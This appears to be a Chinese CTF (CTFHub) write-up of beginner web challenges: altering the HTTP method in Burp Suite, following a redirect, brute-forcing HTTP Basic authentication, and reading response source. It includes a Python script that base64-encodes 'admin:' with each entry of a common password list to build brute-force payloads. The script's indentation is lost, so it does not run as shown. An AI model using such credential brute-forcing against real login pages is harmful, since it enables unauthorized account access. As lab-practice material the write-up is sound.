HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。打开网址,出现
利用burp抓包软件,浏览器建议使用火狐,先配好代理(网上搜“burp使用”)
打开proxy的intercept按钮里面的“intercept is on”,刷新下网址,进行抓包
将抓取到的信息报里的get 改成 “CTFHUB”,在点击 action -> send to repeater
点击Repeater, 查看flag
点击链接,还是显示原来的页面,存在跳跃现象,如下图
需要管理人身份才可以进行访问
burp

【参考资料】
【问题描述】
在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。
详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证

"""
Author:Lucky_bacon
Tool:Pycham、python3
"""
#! /usr/bin/env python3 # _*_ coding:utf-8 _*_
import base64
# 字典文件路径
dic_file_path = './10_million_password_list_top_100.txt'
with open(dic_file_path, 'r') as f:
password_dic = f.readlines()
username = 'admin:' # 用户名
for password in password_dic:
str1=str.encode(username + password.strip())
encodestr = base64.b64encode(str1)
encodestr=str(encodestr)
encodestr=encodestr.strip('b\'')
encodestr=encodestr.replace("=","\=") #避免“=”被转译
print(encodestr)

【问题描述】
HTTP响应包源代码查看
具体思路——直接查看源码即可